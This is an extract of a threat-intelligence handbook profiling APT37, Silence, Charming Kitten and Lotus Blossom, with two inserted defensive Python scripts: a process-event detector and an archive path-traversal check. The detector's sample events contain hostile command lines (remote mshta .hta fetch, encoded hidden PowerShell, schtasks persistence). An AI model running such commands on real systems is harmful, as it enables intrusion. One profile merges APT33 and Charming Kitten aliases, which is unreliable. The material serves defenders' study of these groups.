Execution: T1053 - Scheduled Task; T1059 - Command-Line Interface; T1064 - Scripting; T1086 - PowerShell; T1117 - Regsvr32; T1173 - Dynamic Data Exchange; T1191 - CMSTP; T1203 - Exploitation for Client Execution; T1204 - User Execution; T1218 - Signed Binary Proxy Execution; T1220 - XSL Script Processing
Persistence: T1050 - New Service; T1053 - Scheduled Task; T1037 - Logon Scripts; T1060 - Registry Run Keys / Startup Folder; T1108 - Redundant Access
Privilege Escalation: T1050 - New Service; T1053 - Scheduled Task; T1055 - Process Injection; T1068 - Exploitation for Privilege Escalation; T1088 - Bypass User Account Control
Defense Evasion: T1027 - Obfuscated Files or Information; T1055 - Process Injection; T1064 - Scripting; T1088 - Bypass User Account Control; T1107 - File Deletion; T1108 - Redundant Access; T1117 - Regsvr32; T1191 - CMSTP; T1218 - Signed Binary Proxy Execution; T1220 - XSL Script Processing
Discovery: T1046 - Network Service Scanning; T1063 - Security Software Discovery
Lateral Movement: T1037 - Logon Scripts; T1076 - Remote Desktop Protocol; T1105 - Remote File Copy
Command and Control: T1032 - Standard Cryptographic Protocol; T1071 - Standard Application Layer Protocol; T1105 - Remote File Copy; T1219 - Remote Access Tools

Alias _ APT 37, ATK4, GROUP 123, OPERATION DAYBREAK, OPERATION EREBUS, REAPER, RED EYES, RICOCHET CHOLLIMA, SCARCRUFT
Score _ 66
Threat Actor _ State Sponsored
Targeted Sectors _ Aerospace, Chemical, Healthcare, High-Tech, Manufacturing, Transportation
Motivations & Objectives _ Espionage
Language _ Korean

DESCRIPTION
APT37 (aka Group 123, Reaper, Scarcruft) is a North Korean cyber espionage group active since at least 2012. This group targets the public and private sector, mostly in South Korea. FireEye judges that its primary mission is covert intelligence gathering in support of North Korea's strategic military, political and economic interests. This threat actor is skilled and resourceful. By its focus on South Korean targets, this group can be compared to Unit 91, which has similar objectives. While from 2014 to 2017 APT37 targeted primarily the South Korean government, military, defense industrial base, and media sector, APT37 then switched to more international targets with new attacks against the Middle East, Japan and Vietnam. These new targets are all related to North Korean interests. This group uses spear phishing, strategic web compromises or torrent file-sharing as initial infection vectors. From 2014 to 2017 their lure documents were written in Korean and were related to themes relative to the Korean peninsula. It uses various legitimate platforms as C2 and has access to multiple 0-day vulnerabilities. The group can incorporate recently disclosed vulnerabilities in its toolset. This can be explained by the collaboration of different units within the North Korean Reconnaissance General Bureau. APT37 uses a C2 infrastructure composed of compromised servers, messaging platforms, cloud services and social media to communicate or deploy its malware and avoid detection. The small websites that were leveraged were probably victims of opportunistic attacks.

TOOLS, MALWARES AND VULNERABILITIES


Malwares: CORALDECK, DOGCALL, HAPPYWORK, GELCAPSULE, KARAE, MILKDROP, POORAIM, RICECURRY, RUHAPPY, SHUTTERSPEED, SOUNDWAVE, SLOWDRIFT, WINERACK, ZUMKONG

Legitimate software: None

Exploited vulnerabilities: CVE-2017-0199, CVE-2013-0808, CVE-2015-5119, CVE-2018-4878, CVE-2015-3105, CVE-2015-2419, CVE-2016-1019, CVE-2014-8439, CVE-2016-4117, CVE-2015-5122, CVE-2015-7645, CVE-2015-2545, CVE-2015-2387, CVE-2013-4979, CVE-2018-0802



Targeted Countries _ Hong Kong, Japan, Middle East, South Korea, Vietnam

Assumed origin of the attacker _ North Korea

CAMPAIGNS
August 2016 - March 2017 - Golden Time campaign
APT37 used spear-phishing about the "Korean Reunification and North Korean Conference", using a compromised email account from the Yonsei University network. The documents leveraged CVE-2013-0808 to download DOGCALL/ROKRAT.

November 2016 - January 2017 - Evil New Year campaign
APT37 targeted South Korea using spear-phishing emails allegedly sent by the Korean Ministry of Unification. The use of malicious Hancom Hangul documents reduces the risk of being detected by security tools. The lure documents were about New Year's activities of North Korea. These documents dropped binaries which try to connect to the compromised Korean Government Legal Services (KGLS) website. During this campaign, the reconnaissance phase was separated from the DOGCALL/ROKRAT payload.

May 2017 - APT37 targets a Middle Eastern company (Freemilk campaign)
In May 2017, APT37 used a spear phishing lure against a board member of a Middle Eastern financial company, exploiting CVE-2017-0199, which had been disclosed recently. The targeted company was involved in North Korean affairs and was attacked quickly after media reported on the termination of their collaboration. APT37 used the malware SHUTTERSPEED/Freenki.

November 2017 - North Korean Human Rights campaign
APT37 used lure documents related to a meeting held on 1st November in Seoul, South Korea. This document is written in Korean and contains a new version of DOGCALL/ROKRAT.

January 2018 - Evil New Year 2018 campaign
This is a spear-phishing campaign using a lure document about an analysis of the 2018 New Year speech made by the leader of North Korea, alleged to have been written by the Ministry of Reunification. This is the same method used one year earlier.

September 2018 - ScarCruft targets a Russian organization related to North Korean affairs
On September 21, 2018, ScarCruft attacked a Russian victim who had been compromised by the APT group called DarkHotel in March 2018. The fact that this victim visits North Korea makes it special and suggests that it may have valuable information about North Korean affairs. APT37 and DarkHotel are both Korean speakers but seem to be in conflict. There is some overlap in their victimology, but they use different TTPs and tools. It is not impossible that one of these groups is regularly watching the other.

Timeline: Aug-2016 Golden Time campaign; Nov-2016 Evil New Year campaign; May-2017 APT37 targets a Middle Eastern company (Freemilk campaign); Nov-2017 North Korean Human Rights campaign; Jan-2018 Evil New Year 2018 campaign; Sep-2018 ScarCruft targets a Russian organization related to North Korean affairs.


MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access: T1192 - Spearphishing Link; T1189 - Drive-by Compromise; T1193 - Spearphishing Attachment
Execution: T1106 - Execution through API; T1059 - Command-Line Interface; T1203 - Exploitation for Client Execution; T1173 - Dynamic Data Exchange; T1064 - Scripting; T1204 - User Execution
Persistence: T1060 - Registry Run Keys / Startup Folder
Privilege Escalation: T1088 - Bypass User Account Control; T1055 - Process Injection
Defense Evasion: T1102 - Web Service; T1045 - Software Packing; T1088 - Bypass User Account Control; T1055 - Process Injection; T1064 - Scripting; T1027 - Obfuscated Files or Information; T1116 - Code Signing
Credential Access: T1003 - Credential Dumping
Discovery: T1057 - Process Discovery; T1033 - System Owner/User Discovery; T1082 - System Information Discovery; T1120 - Peripheral Device Discovery
Lateral Movement: T1105 - Remote File Copy
Collection: T1123 - Audio Capture; T1005 - Data from Local System
Command and Control: T1071 - Standard Application Layer Protocol; T1105 - Remote File Copy; T1102 - Web Service; T1043 - Commonly Used Port; T1094 - Custom Command and Control Protocol
Impact: T1487 - Disk Structure Wipe

Alias _ ATK 86, SILENT GROUP, TAG-CR8
Score _ 65
Threat Actor _ Cyber Criminal
Targeted Sectors _ Financial Services, Government Agencies
Motivations & Objectives _ Organizational gain
Language _ Russian, English

DESCRIPTION
Silence Group is a cybercrime group that has been active since the end of 2016 and has attacked mostly banks all over the world. The group is believed to be from Russia, because most of their attacks (at least at the beginning) were directed against banks from Russia and former Soviet Union countries. Furthermore, they used a very high level of Russian in their phishing emails, and it was found that some of the commands of their tools were in Russian. However, over the years, the group has shifted to attacking banks all over the world, such as in East Asia, Europe and more. The group is known for their sophisticated and profound attacks, in which they usually take a long period of time to study the potential victim, to maximize the attack against them. In most cases, spear-phishing emails with a malicious file attached were sent to bank employees. This usually downloaded the Silence Trojan, which has many capabilities: stealing data, downloading additional tools, tracking victims and more. A few versions of the tool were found, and they show that the group is continuing to enhance them. Furthermore, the group uses malware to attack ATMs specifically, such as Atmosphere. Through this, the group was able to steal millions of dollars in cash over the years, mostly from banks in Russia and Eastern Europe. Overall, the group continues to be highly active, and new campaigns were uncovered just in the past few months.

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: Silence Downloader (TrueBot, MainModule), Smoke Bot, SurveillanceModule, Kikothac, Atmosphere, Farse, Ivoke, EDA, xfs-disp.exe
Tools used by multiple adversaries: Perl IrcBot
Publicly available tools: Meterpreter

Legitimate software: RAdmin

Exploited vulnerabilities: CVE-2017-11882, CVE-2017-0199, CVE-2018-0802, CVE-2018-8174, CVE-2017-0262



Targeted Countries _ Armenia, Austria, Azerbaijan, Bangladesh, Belarus, Cyprus, Czech Republic, Georgia, Germany, Greece, Hong Kong, Israel, Kazakhstan, Kenya, Kyrgyzstan, Latvia, Malaysia, Poland, Romania, Russia, Serbia, Switzerland, Taiwan, Turkey, Ukraine, United Kingdom, Uzbekistan, Vietnam

Assumed origin of the attacker _ Russia (or former Soviet Union countries)

CAMPAIGNS
July-August 2016 - Silence targets the Automated Workstation Client of the Russian Central Bank
The group gained access to the Automated Workstation Client of the Russian Central Bank (AWS CBR), which enables the transfer of funds between Russian banks. The station was located in part of a Russian bank, and through it the group tried to steal funds. However, the attack was thwarted by the bank itself because of improper preparation of the payment order. A month later, the group gained access to a server of the same bank, and this time downloaded software that takes screenshots, which were sent to the attackers. Also in this case, the attack was stopped before any valuable information was stolen.

September 2017 - Silence targets banks
A targeted attack was launched against banks in Russia, Malaysia and Armenia. In this case the group gained access to the internal networks of the banks, and then studied their day-to-day work. This stage was in order to create a very focused attack, which would make it more successful. The group has also used spear phishing emails with malicious attachments to compromise the victims.

October 2017 - Silence Group attacked ATMs
Silence Group attacked ATMs and stole hundreds of thousands of dollars from a Russian bank, alongside DDoS attacks against them, using IRC channels to control the Trojans. Of note, even though they again had access to the AWS CBR system, they did not try to exploit this system this time.

January 2018 - February 2018 - Attacks against financial institutions
Financial institutions in the UK, India and Russia were attacked, and funds were stolen from most of them. The attack in most cases used malicious Word documents.

February - April 2018 - Attacks against Russian and Eastern European banks
As part of two attacks against Russian and Eastern European banks, hundreds of thousands of dollars were stolen. In the first case, more than half a million dollars were stolen through card processing. In the second one they stole about 150,000 dollars after they used their own tool on ATMs to steal the funds.

May 2018 - October 2018 - Spear-phishing campaigns against banks in Russia
Emails with malicious Word attachments were sent to banks in Russia, which exploited the CVE-2017-11882 vulnerability to install the Silence Trojan. The first attack was against Russian banks, and the second was against a bank in India.

October 2018 - January 2019 - Reconnaissance campaigns against banks
The group launched three reconnaissance campaigns against banks in different areas. As part of the campaigns, tens of thousands of emails were sent to different targets with a picture or a link, but without a malicious payload. The purpose of this campaign was to update their email list (with the active emails), and to see their cyber-security defenses. The campaign was launched against South Asian countries (Taiwan, Malaysia, and South Korea), former Soviet Union countries (Kyrgyzstan, Kazakhstan, and Ukraine) and European countries (mostly British). In most cases, the victims that received the phishing emails were bank employees.

March 2019 - May 2019 - ATM attacks
At the end of May 2019, a few individuals stole large amounts of money from an ATM of the Bangladeshi bank Dutch-Bangla on a few separate days. Two possibilities were raised as to how this was possible: by using the Atmosphere Trojan that was previously deployed on the attacked devices, or through the card processing mechanism. Of note, two other Bangladeshi banks (NCC Bank and Prime Bank) were also attacked at the same time, but they were eventually able to thwart the attack.

June 2019 - July 2019 - Silence targets banks using the EDA trojan
The group attacked banks in Russia, Chile, Bulgaria, Costa Rica and Ghana. In some of these attacks the EDA Trojan was used.

June 2019 - July 2019 - Attack of the Russian IT bank
At the beginning, emails with a malicious attachment that looked like invitations to the International Financial Forum iFin-2019 were sent to employees of the Russian IT bank. The email contained a ZIP archive attachment that deployed the latest version of the Silence malware.

Timeline: Jul-Aug-2016 Silence targets the Automated Workstation Client of the Russian Central Bank; Sep-2017 Silence targets banks; Oct-2017 Silence Group attacked ATMs; Jan-Feb-2018 Attacks against financial institutions; Feb-Apr-2018 Attacks against Russian and Eastern European banks; May-Oct-2018 Spear-phishing campaigns against banks in Russia; Oct-2018 Reconnaissance campaigns against banks; Mar-2019 ATM attacks; Jun-2019 Silence targets banks using the EDA trojan; Jun-2019 Attack of the Russian IT bank.

73
Alias _ ATK 86, SILENT GROUP, TAG-CR8
Score _ 65
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown (the applicable category is highlighted on the original card)
Targeted Sectors _ Financial Services, Government Agencies
Motivations & Objectives _ Organizational gain
Language _ Russian, English
Assumed origin of the attacker _ Russia (or former Soviet Union countries)
Targeted Countries _ Armenia, Austria, Azerbaijan, Bangladesh, Belarus, Cyprus, Czech Republic, Georgia, Germany, Greece, Hong Kong, Israel, Kazakhstan, Kenya, Kyrgyzstan, Latvia, Malaysia, Poland, Romania, Russia, Serbia, Switzerland, Taiwan, Turkey, Ukraine, United Kingdom, Uzbekistan, Vietnam

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1193 - Spearphishing Attachment

Execution
T1035 - Service Execution
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1106 - Execution through API
T1170 - Mshta
T1203 - Exploitation for Client Execution
T1204 - User Execution
T1223 - Compiled HTML File

Persistence
T1053 - Scheduled Task
T1060 - Registry Run Keys / Startup Folder

Privilege Escalation
T1053 - Scheduled Task
T1134 - Access Token Manipulation

Defense Evasion
T1027 - Obfuscated Files or Information
T1064 - Scripting
T1107 - File Deletion
T1134 - Access Token Manipulation
T1140 - Deobfuscate/Decode Files or Information
T1170 - Mshta
T1223 - Compiled HTML File

Discovery
T1082 - System Information Discovery

Lateral Movement
T1105 - Remote File Copy

Collection
T1113 - Screen Capture
T1125 - Video Capture

Command and Control
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol
T1079 - Multilayer Encryption
T1105 - Remote File Copy
T1132 - Data Encoding
T1219 - Remote Access Tools

Exfiltration
T1022 - Data Encrypted

Impact
T1489 - Service Stop

74 The Cyberthreat Handbook • Thales - Verint
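The Execution and Defense Evasion techniques listed for Silence (mshta, compiled HTML files, PowerShell, scheduled tasks) leave process-creation evidence that a SOC can alert on. The script below is an added example, not material from the handbook or from any vendor: it runs a few simple rules over constructed Sysmon-style process-creation records (the host names, timestamps, paths and the encoded command are all invented for the example) and tags each hit with the technique ID from the table above.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records in a Sysmon Event ID 1 style.
# Hosts, timestamps, paths and the encoded command are made up for the example.
SAMPLE_EVENTS = [
    {"ts": "2019-06-03T09:12:01", "host": "ws-017", "parent": "WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.23/inv.hta"},
    {"ts": "2019-06-03T09:12:04", "host": "ws-017", "parent": "mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": "2019-06-03T09:12:09", "host": "ws-017", "parent": "powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /SC ONLOGON /TN "Updater" /TR "C:\Users\Public\up.exe"'},
    {"ts": "2019-06-03T09:15:30", "host": "ws-021", "parent": "OUTLOOK.EXE",
     "image": r"C:\Windows\hh.exe",
     "cmdline": r"hh.exe C:\Users\a.user\AppData\Local\Temp\invitation.chm"},
    {"ts": "2019-06-03T09:20:00", "host": "ws-030", "parent": "explorer.exe",
     "image": r"C:\Windows\hh.exe",
     "cmdline": r"hh.exe C:\Program Files\Vendor\help\manual.chm"},
    {"ts": "2019-06-03T09:21:10", "host": "ws-030", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Parents that should not normally spawn HTML Help or script hosts.
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|Public)\\", re.I)


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK ID as printed in the Silence table above
    host: str
    ts: str
    reason: str


def image_name(path: str) -> str:
    """Basename of an image path, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: dict) -> list:
    """Apply the rules to one process-creation event and return its findings."""
    findings = []
    img = image_name(event["image"])
    parent = event["parent"].upper()
    cmd = event["cmdline"]

    # T1170 Mshta: mshta.exe fetching a remote .hta or running inline script.
    if img == "mshta.exe" and re.search(r"https?://|\.hta\b|javascript:|vbscript:", cmd, re.I):
        findings.append(Finding("T1170", event["host"], event["ts"],
                                "mshta.exe launched with a remote or inline script"))

    # T1223 Compiled HTML File: hh.exe started by a mail/Office client or opening a
    # .chm from a user-writable location (a vendor manual under Program Files is not flagged).
    if img == "hh.exe" and (parent in OFFICE_PARENTS or USER_WRITABLE.search(cmd)):
        findings.append(Finding("T1223", event["host"], event["ts"],
                                "hh.exe opened a CHM from a mail client or a user-writable path"))

    # T1086 PowerShell: encoded command line (-e/-ec/-enc/-encodedcommand).
    if img == "powershell.exe" and re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", cmd, re.I):
        findings.append(Finding("T1086", event["host"], event["ts"],
                                "powershell.exe with an encoded command"))

    # T1053 Scheduled Task: schtasks.exe creating a task, here chained from PowerShell.
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        findings.append(Finding("T1053", event["host"], event["ts"],
                                "schtasks.exe /Create from an interactive session"))
    return findings


def scan(events: list) -> list:
    """Run detect() over a batch of events, preserving their order."""
    return [f for ev in events for f in detect(ev)]


def summarize(findings: list) -> dict:
    """Count findings per technique ID, e.g. {'T1053': 1, 'T1086': 1, ...}."""
    counts = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return dict(sorted(counts.items()))


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host} {f.technique}: {f.reason}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

On the sample batch the first host produces the mshta, PowerShell and schtasks findings in sequence, the Outlook-spawned CHM on the second host is flagged, and the vendor manual opened from Explorer is left alone; in production the parent/child and path conditions are what keep the hh.exe and schtasks rules from drowning in legitimate activity.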
Alias _ APT33, ATK35, CHARMING KITTEN, ELFIN, GROUP 83, IKITTENS, MAGNALLIUM, NEWSBEEF, NEWSCASTER, PARASTOO
Score _ 64
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Aerospace, Aviation, Chemicals, Communication, Defence, Dissident, Education, Energy, Financial Services, Government Agencies, Healthcare, High-Tech, Manufacturing, Media, Research
Motivations & Objectives _ Espionage
Language _ Unknown
Assumed origin of the attacker _ Iran
Targeted Countries _ Iran, Iraq, Israel, Saudi Arabia, South Korea, United Kingdom, United States

DESCRIPTION

ATK35 is an Iranian cyberespionage group operating since approximately 2013. This adversary targets organizations involved in the government, defense technology, military and diplomacy sectors. It has been known to leverage fraudulent social network profiles to target individuals and organizations of interest through credential collection and malware infection via an IRC-based malware variant. The scope of elaborate personas and fraudulent organizations created by CHARMING KITTEN reveals that this adversary engages in a level of preparation and patience not often seen in targeted intrusion efforts. This actor will also target third-party service providers in order to compromise organizations of interest. ATK35 usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with those of another group, ATK26 (Rocket Kitten), resulting in reporting that may not distinguish between the two groups' activities.

ClearSky exposed a connection between Charming Kitten and Behzad Mesri, an Iranian national indicted for his involvement in hacking HBO. By pivoting off the malicious infrastructure, ClearSky found a sample of MAGICHOUND.RETRIEVER, a malware covered in a report by Palo Alto Networks about a group they call Magic Hound.

TOOLS, MALWARES AND VULNERABILITIES

Malwares _ AutoIt backdoor, DownPaper, NanoCore, NETWIRE, POWERTON, Shamoon, TURNEDUP
Legitimate software _ Mimikatz
Exploited vulnerabilities _ None
CAMPAIGNS

2011-2014 - Operation “Newscaster”

For three years the group created fake accounts on social networks and a fake information website to spy on military and political leaders in the United States and Israel. The targets included a four-star U.S. Navy Admiral, U.S. legislators and ambassadors, as well as personnel from Afghanistan, Britain, Iraq, Israel, Saudi Arabia and Syria. It appears that the attackers were seeking authorizations to access government and corporate networks, as well as information on weapons systems and diplomatic negotiations. The hackers created fake accounts on Facebook and other social networks for 14 people, populated the profiles with fictitious personal content, and then tried to befriend their targets. As a result, the group reached more than 2,000 people (including some people working for the FBI).

2016 - NewsBeEF Operation

At the end of February 2016, the Internet portal of an Iranian university was identified as being able to spy on its visitors through the browsers they used.

2016-2017 - Vast espionage campaign using DownPaper

The group seems to focus on people of interest to Iran in the areas of academic research, human rights and media. The focus is on Iranian dissidents living in Iran or abroad, as well as people who come into contact with Iranians or report on Iranian affairs, such as journalists and reporters, media covering Iran and political advisors. Most of the targets are people living in Iran, the United States, Israel and the United Kingdom. Others live in Turkey, France, Germany, Switzerland, the United Arab Emirates, India, Denmark and other countries.

2016-2017 - Operations against the United States, Saudi Arabia and South Korea

APT33 has targeted organizations – spanning multiple industries – headquartered in the United States, Saudi Arabia and South Korea. These organizations are linked to the aviation sector (in both military and commercial capacities), as well as organizations in the energy sector with ties to petrochemical production.

Early 2017 - MacDownloader campaign targeting the defense industrial base

An active staging of the MacDownloader agent was first observed on a site posing as the aerospace company “United Technologies Corporation”. The page claimed to offer “special programs and courses”, specifically mentioning employees and trainees of Lockheed Martin, Sierra Nevada Corporation, Raytheon and Boeing.

August 2017 - HBO hacked by Behzad Mesri, linked to ATK35

In the United States, Behzad Mesri has been accused by the American authorities of hacking into HBO's systems and of being linked to the Charming Kitten group (APT33, Elfin, etc.).

December 2018 - February 2019 - Attacks against the Saudi petrochemical sector exploiting the CVE-2018-20250 vulnerability

During the February 2019 attack wave, the group tried to use the WinRAR vulnerability (CVE-2018-20250) to create an archive that could extract itself into an arbitrary folder.

Timeline
• Jan-2011: 2011-2014 Operation Newscaster
• Jan-2016: NewsBeEF Operation
• Jan-2016: 2016-2017 Vast espionage campaign using DownPaper
• Feb-2016: 2016-2017 Operations against the United States, Saudi Arabia and South Korea
• Jan-2017: Early 2017 MacDownloader campaign targeting the defence industrial base
• Aug-2017: HBO hacked by Behzad Mesri, linked to ATK35
• Dec-2018: Dec 2018-Feb 2019 Attacks against the Saudi petrochemical sector exploiting the CVE-2018-20250 vulnerability
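The WinRAR flaw mentioned in the December 2018 - February 2019 campaign lets an archive name an entry so that it is written outside the folder the user extracts to. Whatever the archive format, the defensive check is the same: resolve every entry name against the destination before writing and refuse anything that escapes it. The function below is an added example, not content from the handbook and not WinRAR's or any archiver's code; the destination path and the sample entry names are constructed.

```python
import ntpath
import posixpath

# Constructed entry names, as a tool would read them from an archive's headers.
SAMPLE_ENTRIES = [
    "report/q1.docx",                       # ordinary relative path
    "docs/../readme.txt",                   # '..' that still resolves inside
    "../../home/user/.profile",             # POSIX-style traversal
    "..\\..\\Users\\Public\\run.exe",       # Windows-style traversal
    "C:/Users/Public/run.exe",              # drive-absolute path
    "//fileserver/share/run.exe",           # UNC path
    "/etc/cron.d/job",                      # rooted path
    "",                                     # empty name
]


def is_safe_entry(name: str, dest: str = "/srv/extract") -> bool:
    """
    True only if an archive member called `name` would be written inside `dest`.

    Rejects empty names and embedded NULs, drive letters and UNC prefixes,
    rooted paths, and any '..' that climbs above `dest`, treating '/' and '\\'
    alike so that Windows-style names are judged the same way as POSIX ones.
    """
    if not name or "\x00" in name:
        return False
    if ntpath.splitdrive(name)[0]:          # 'C:...' or '\\\\host\\share...'
        return False
    unified = name.replace("\\", "/")
    if unified.startswith("/"):             # '/etc/...' or '//host/share/...'
        return False
    root = posixpath.normpath(dest)
    target = posixpath.normpath(posixpath.join(root, unified))
    return target == root or target.startswith(root.rstrip("/") + "/")


def vet_archive(entries, dest: str = "/srv/extract"):
    """Split entry names into (accepted, rejected) lists for a given destination."""
    accepted, rejected = [], []
    for name in entries:
        (accepted if is_safe_entry(name, dest) else rejected).append(name)
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = vet_archive(SAMPLE_ENTRIES)
    print("accepted:", ok)
    print("rejected:", bad)
```

The check is done on the normalised final path, not on the presence of ".." alone, which is why "docs/../readme.txt" is accepted while "../../home/user/.profile" is not; a tool that extracts with this guard still has to apply it per entry before each write, since a single accepted name does not vouch for the rest of the archive.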

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1192 - Spearphishing Link
T1078 - Valid Accounts

Execution
T1053 - Scheduled Task
T1203 - Exploitation for Client Execution
T1086 - PowerShell
T1204 - User Execution

Persistence
T1053 - Scheduled Task
T1078 - Valid Accounts
T1060 - Registry Run Keys / Startup Folder

Privilege Escalation
T1053 - Scheduled Task
T1068 - Exploitation for Privilege Escalation
T1078 - Valid Accounts

Defense Evasion
T1078 - Valid Accounts
T1027 - Obfuscated Files or Information
T1480 - Execution Guardrails

Credential Access
T1003 - Credential Dumping
T1110 - Brute Force
T1040 - Network Sniffing

Discovery
T1040 - Network Sniffing

Lateral Movement
T1105 - Remote File Copy

Command and Control
T1065 - Uncommonly Used Port
T1071 - Standard Application Layer Protocol
T1132 - Data Encoding
T1105 - Remote File Copy
T1032 - Standard Cryptographic Protocol
T1043 - Commonly Used Port

Exfiltration
T1002 - Data Compressed
T1048 - Exfiltration Over Alternative Protocol
Alias _ ATK1, DRAGONFISH, ELISE, LOTUS BLOSSOM, SPRING DRAGON, ST GROUP
Score _ 64
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Communication, Education, Government Agencies, Military
Motivations & Objectives _ Espionage
Language _ Unknown

DESCRIPTION

ATK1 (aka Lotus Blossom, Spring Dragon, DragonFish) is a cyber espionage threat group which targets countries around the South China Sea. It has been active since at least 2012 and targets high-profile governmental organizations and political parties, universities and telecommunication companies in long-term operations. The group is of Chinese origin. Using Elise malware in particular, it spied on many government organizations, mostly in Southeast Asia, probably in support of the Silk Roads project and securing the maritime face of the project.

At the end of 2015, Emissary received many updates, probably to avoid detection by security products. After a very active period, the group remained discreet until early 2017. Other campaigns were conducted sporadically until 2018, always using Elise as the main attack vector, and sometimes using new exploits, such as CVE-2017-11882.

ATK1 is capable of carrying out very large operations over a long period of time, while developing its specific arsenal. Its targets are extremely specific, and the group rarely deviates from them.

CAMPAIGNS

2012 - Phishing campaign using a PDF document containing an invitation to a defence event

In September 2012, a phishing campaign using a PDF document containing an invitation to a defence event was detected.

2013 - Attack against Taiwan, the United States, Canada and some other countries

In the second half of 2013, during a new campaign, Elise malware was identified as part of a larger malware group, called LStudio. This campaign mainly targeted Taiwan (nearly 84% of attacks) as well as the United States, Canada and other countries. Governments, electronics manufacturers and telecommunications companies were the first victims.

Attack against military and government targets in Vietnam, the Philippines, Hong Kong, Taiwan and Indonesia

A particularly important campaign took place between 2012 and 2015. It was mainly organized around four countries, with a dedicated infrastructure for each target. The four countries are Vietnam, the Philippines, Hong Kong and Taiwan (same infrastructure), as well as Indonesia.

2015 - Emissary malware used against the French Ministry of Foreign Affairs

In 2015 the group was particularly active, demonstrating new distribution methods for its malware, particularly using “water holes”. The group also attacked the French Ministry of Foreign Affairs and more particularly a diplomat stationed in Taipei.

2017 - Elise campaign against its traditional targets in Southeast Asia

In 2017 ATK1 ran a campaign focused on its traditional targets: government organizations, academic institutions and telecoms in Southeast Asia.

Timeline
• Jan-2012: Attack against military and government targets in Vietnam, Philippines, Hong Kong, Taiwan and Indonesia
• Sept-2012: Phishing campaign using a PDF document containing an invitation to a defence event
• Jul-2013: Attack against Taiwan, United States, Canada and some other countries
• Jan-2015: Emissary malware used against the French Ministry of Foreign Affairs
• Jan-2017: Elise campaign against its traditional targets in Southeast Asia

TOOLS, MALWARES AND VULNERABILITIES

Malwares _ Elise, Emissary
Legitimate software _ None
Exploited vulnerabilities _ CVE-2017-11882, CVE-2014-6332, CVE-2012-0158, CVE-2014-4114, CVE-2009-0927
Targeted Countries _ Hong Kong, Indonesia, Philippines, Taiwan, Vietnam
Assumed origin of the attacker _ China

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1189 - Drive-by Compromise
T1193 - Spearphishing Attachment

Execution
T1035 - Service Execution
T1064 - Scripting
T1085 - Rundll32

Persistence
T1136 - Create Account
T1050 - New Service
T1060 - Registry Run Keys / Startup Folder
T1098 - Account Manipulation

Privilege Escalation
T1050 - New Service
T1055 - Process Injection

Defense Evasion
T1027 - Obfuscated Files or Information
T1036 - Masquerading
T1045 - Software Packing
T1055 - Process Injection
T1064 - Scripting
T1085 - Rundll32
T1107 - File Deletion
T1140 - Deobfuscate/Decode Files or Information
T1497 - Virtualization/Sandbox Evasion

Credential Access
T1098 - Account Manipulation

Discovery
T1046 - Network Service Scanning
T1057 - Process Discovery
T1082 - System Information Discovery
T1087 - Account Discovery
T1135 - Network Share Discovery
T1497 - Virtualization/Sandbox Evasion

Lateral Movement
T1105 - Remote File Copy

Command and Control
T1032 - Standard Cryptographic Protocol
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol
T1094 - Custom Command and Control Protocol
T1105 - Remote File Copy

Exfiltration
T1022 - Data Encrypted
Alias _ ATK116, CLOUD ATLAS, INCEPTION GROUP
Score _ 63
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Aerospace, Energy, Government Agencies, Military, Research
Motivations & Objectives _ Cyber Espionage
Language _ Russian

DESCRIPTION

Cloud Atlas is a cyber espionage group active since at least 2007, focusing on governmental agencies around the world. This group is known for Operation Red October, which targeted governmental agencies (embassies), research, energy, aerospace and military organizations in a wide range of countries, mostly in Russia, Western and Eastern Europe, Central Asia, South America and Africa. This group seems to have Russian-speaking origins. It used a large CnC network of infected machines and dozens of domain names working as a chain of proxies to hide the attacker's location. Cloud Atlas is able to target mobile devices, network equipment and removable disk drives, increasing the quantity of sensitive data accessible. They use multiple exploits but no 0-days, which can be interpreted as a lack of resources.

Cloud Atlas created the Inception framework, a sophisticated framework able to launch multiple modules, allowing the group to adapt to its target. This framework is still used in 2019.

After the Kaspersky disclosure in 2013, the group went into hiding and then reappeared in 2014 with the “Cloud Atlas” malware. This behaviour was repeated later in 2014 following a new Symantec publication. The group improved its C2 infrastructure in 2014 by using cloud services, which have the advantage of not being blacklisted and of using encrypted communication protocols. They can also use compromised routers as proxies to hide their origin.

CAMPAIGNS

2007 - 2013 - Operation Red October

